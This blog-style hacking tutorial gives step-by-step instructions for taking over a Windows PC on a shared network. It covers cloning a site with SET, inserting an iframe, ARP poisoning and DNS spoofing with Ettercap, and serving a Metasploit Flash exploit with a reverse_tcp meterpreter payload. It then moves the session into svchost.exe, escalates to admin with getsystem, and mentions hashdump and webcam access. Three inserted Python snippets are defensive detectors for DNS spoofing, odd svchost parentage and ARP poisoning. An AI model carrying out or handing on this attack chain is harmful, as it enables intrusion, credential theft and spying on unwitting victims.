Today we'll hack Windows and get admin access.
We'll use the Adobe Flash Player vulnerability exploit from Metasploit here. It's easy, and it works to get a steady meterpreter session.
Required hack tools to hack Windows and get admin access:
1. Linux with Metasploit
2. Adobe Flash Player exploit module
3. Apache server and Ettercap for ARP spoofing
First, you have to be on your victim's network. It may be LAN or WLAN.
Create any website that your victim will be using. You can clone the website by using SET (Social Engineering Toolkit).
How to clone website using SET
After getting the cloned website, place it in your Apache server's root location,
i.e. /var/www/html/.
Edit the HTML file and place an iframe in it.
Type your local IP address; you can get it by typing ifconfig in a new terminal (bash).
Then save the file to /var/www/html/ and rename it to index.html.
Start Attack:
To start the attack, you have to make your victim come to your page.
To do that, you have to perform DNS spoofing and ARP poisoning. So open up Ettercap; you can open it in graphical mode as well as in the terminal.
After starting Ettercap, go to a new terminal and open the file etter.dns.
To find it, type leafpad /etc/etter/dns/etter.dns
Open that file, go to the DNS section, and edit the file: place your IP address in it and use * so that all requests made by the DNS resolver will be redirected to our website, which is placed on our Apache server.
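A wildcard entry like the one described above leaves a recognisable trace on the client side: many unrelated public hostnames suddenly resolve to one private LAN address. The following is an added defensive example, not part of the original tutorial; the log format, the sample records and the function names are constructed for illustration, and the two-label domain guess is a simplifying assumption.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: (queried name, A-record answer) pairs as a client-side
# resolver log might record them. Not taken from the original page.
SAMPLE_ANSWERS = [
    ("www.example.com", "93.184.216.34"),
    ("mail.example.org", "192.168.1.50"),
    ("news.example.net", "192.168.1.50"),
    ("shop.example.com", "192.168.1.50"),
    ("printer.lan", "192.168.1.20"),
]


def base_domain(name):
    """Crude registrable-domain guess: the last two labels (assumption:
    no public-suffix list is consulted)."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def suspicious_answers(answers, local_suffixes=(".lan", ".local"), threshold=3):
    """Return {ip: sorted domains} for every private address that at least
    `threshold` unrelated public-looking domains resolve to."""
    by_ip = defaultdict(set)
    for name, ip in answers:
        if name.lower().endswith(local_suffixes):
            continue  # internal names legitimately map to private space
        if ipaddress.ip_address(ip).is_private:
            by_ip[ip].add(base_domain(name))
    return {ip: sorted(d) for ip, d in by_ip.items() if len(d) >= threshold}


if __name__ == "__main__":
    for ip, domains in suspicious_answers(SAMPLE_ANSWERS).items():
        print(f"possible DNS spoofing: {domains} all resolve to {ip}")
```

Networks that use split-horizon DNS for their own public names need those names added to the local suffix list to avoid false positives.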
So you're ready to go on to Metasploit.
service apache2 start && service postgresql start && msfconsole
After Metasploit has started, find an exploit named
which was released on 02-02-2015.
Search for it in msfconsole.
If you don't find it, download the exploit from here, then copy it into the ~/.msf4/modules/exploit/browser directory. Any exploit put here will be detected by Metasploit when it starts.
Then rename the file to adobe_flash_worker_byte_array_uaf.rb
After that, use that exploit.
To use it, type in msfconsole
The location should be the same as that of the file you saved earlier.
Then set your reverse TCP Windows meterpreter shell:
set payload windows/meterpreter/reverse_tcp
In this meterpreter session we'll migrate the user to a specified program before execution of the exploit.
To do that, type
There you'll find option settings called PrependMigrate and PrependMigrateProc. You'll find that the current setting is False; you should make it true, and there you have to specify the migration program. To do that:
set prependmigrate true
set prependmigrateproc svchost.exe
Now both are set and the migration location is also specified.
What happens with these 2 lines is that when the meterpreter session opens, the exploit leaves the connection that came from the iframe set up earlier and gets migrated to svchost.exe, which is a Windows process that keeps running all the time in Windows.
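Hiding in svchost.exe is detectable because genuine instances have a predictable lineage. The following is an added defensive example, not part of the original tutorial: it audits process-creation records and flags any svchost.exe that was not started by services.exe or does not live in the system directory. The records are constructed in the style of Sysmon Event ID 1 fields, the function name is hypothetical, and it assumes the payload ends up in an svchost.exe started by something other than services.exe (the page does not say how the process is obtained).

```python
import ntpath

# Constructed process-creation records using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

EXPECTED_PARENT = "services.exe"
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def audit_svchost(events):
    """Return (parent image, reasons) for every svchost.exe start that does
    not match the expected parent process or install directory."""
    findings = []
    for ev in events:
        image = ev["Image"].lower()
        if ntpath.basename(image) != "svchost.exe":
            continue
        reasons = []
        parent = ntpath.basename(ev["ParentImage"]).lower()
        if parent != EXPECTED_PARENT:
            reasons.append(f"unexpected parent {parent}")
        if ntpath.dirname(image) not in EXPECTED_DIRS:
            reasons.append(f"unexpected path {ntpath.dirname(image)}")
        if reasons:
            findings.append((ev["ParentImage"], reasons))
    return findings


if __name__ == "__main__":
    for parent, reasons in audit_svchost(SAMPLE_EVENTS):
        print(f"suspicious svchost.exe started by {parent}: {', '.join(reasons)}")
```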
Then set the URI path, LHOST and LPORT:
set URIPATH /
set LHOST your_Ip_address
set LPORT 8084
After this is done, type
Now it will listen on the port you specified in the HTML file's iframe, and as soon as it gets a connection you'll get a meterpreter session on Windows.
But you must make the user come to your site. To do that you must ARP poison and DNS spoof them, because unless you force the user to come to your location they'll never come.
To do that,
go to the terminal and type
So now we've started with the attack.
Start sniffing by choosing unified sniffing from the menu bar and select your interface, Wlan0 or Eth0, whichever you're on. Then go to the scanned host list, get your victim's IP address and add him to target 2, then add the gateway IP address to target 2; it might be like 192.168.1.1 if your victim's IP address is 192.168.1.125.
Select the MITM menu item and select ARP Poisoning. Tick both of the options there,
i.e. one-way poison and sniff remote connections.
Then go to manage plugins and select dns spoof.
After dns spoof has started, wait for your victim to come in.
As soon as he/she tries to enter any site, he/she will be redirected to our web location.
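ARP poisoning of this kind shows up in the affected host's own ARP cache: the gateway's IP address ends up mapped to the same hardware address as another machine on the LAN. The following is an added defensive example, not part of the original tutorial; the `arp -a` text is constructed (reusing the page's 192.168.1.1 gateway and 192.168.1.125 host addresses), and the function names and MAC values are hypothetical.

```python
import re
from collections import defaultdict

# Constructed Windows `arp -a` output from the host at 192.168.1.125.
SAMPLE_ARP = """\
Interface: 192.168.1.125 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           02-00-00-aa-bb-01     dynamic
  192.168.1.77          02-00-00-aa-bb-01     dynamic
  192.168.1.20          02-00-00-cc-dd-02     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)",
    re.I,
)


def dynamic_entries(arp_output):
    """Yield (ip, mac) for dynamic rows; static broadcast/multicast rows
    are skipped because they are shared by design."""
    for line in arp_output.splitlines():
        m = ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            yield m.group(1), m.group(2).lower()


def gateway_mac_shared(arp_output, gateway_ip):
    """Return (mac, other_ips) if the gateway's MAC is also claimed by
    another IP address, else None."""
    mac_to_ips = defaultdict(set)
    for ip, mac in dynamic_entries(arp_output):
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if gateway_ip in ips and len(ips) > 1:
            return mac, sorted(ips - {gateway_ip})
    return None


def gateway_mac_changed(arp_output, gateway_ip, pinned_mac):
    """Compare the cached gateway MAC against a known-good pinned value."""
    for ip, mac in dynamic_entries(arp_output):
        if ip == gateway_ip:
            return mac != pinned_mac.lower()
    return False
```

A static ARP entry for the gateway on sensitive hosts, or Dynamic ARP Inspection on managed switches, prevents the cache from being overwritten in the first place.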
As the connections are made, you'll get a meterpreter session, and the meterpreter session will be migrated to the svchost.exe application running on your victim's Windows machine as well.
As you can see, meterpreter session 1 opened on your prompt. You have to stop or close Ettercap immediately, because our victim will close the browser since all of his requests are poisoned.
Once you have closed Ettercap, he can go to other sites, and he might close the browser, but we have our meterpreter session.
So now type
sessions in the meterpreter shell so you can see active sessions.
sessions -i 1
to select the session, and type
ps to see all the services running on our victim's PC.
Now you can see that our session has been compromised to
(i) internet browser
So as you can see, we are getting all the connections made by the victim, but we don't have administrator privileges to administer his system.
hack windows get admin access
To get Windows admin access you have to use other Windows exploits. To do that, press CTRL+Z on your keyboard; you'll get a prompt asking whether to background the session. Hit y, and you'll fall back to msfconsole while your session stays live in the background.
Get a module named post/multi/recon/local_exploit_suggester
This is a Metasploit module, and it requires a session.
To give it one, type
set session 1
So the session is set. Then type
Now you'll get the vulnerable exploits of the system. You can use them one by one.
We will be using this exploit here
This is a stable exploit that is used to get Windows admin access.
To use it, type
This exploit requires a session, and it works on x86-based Windows.
To set that, type
set session 1 then hit
As your second meterpreter session opens, you can enjoy administrator access.
getuid to check your administrator access, and hit
getsystem to get all the administrative privileges. Now you can watch everything on the computer.
You can open files, get a hashdump, use the webcam, etc.
If you don't know how to use them all, just type
help and see all the options.
So now you've got all the admin powers.
I hope this tutorial is helpful for understanding how to hack Windows and get admin access. If you have any queries, comment. Keep hacking! Keep visiting 🙂 Thank you.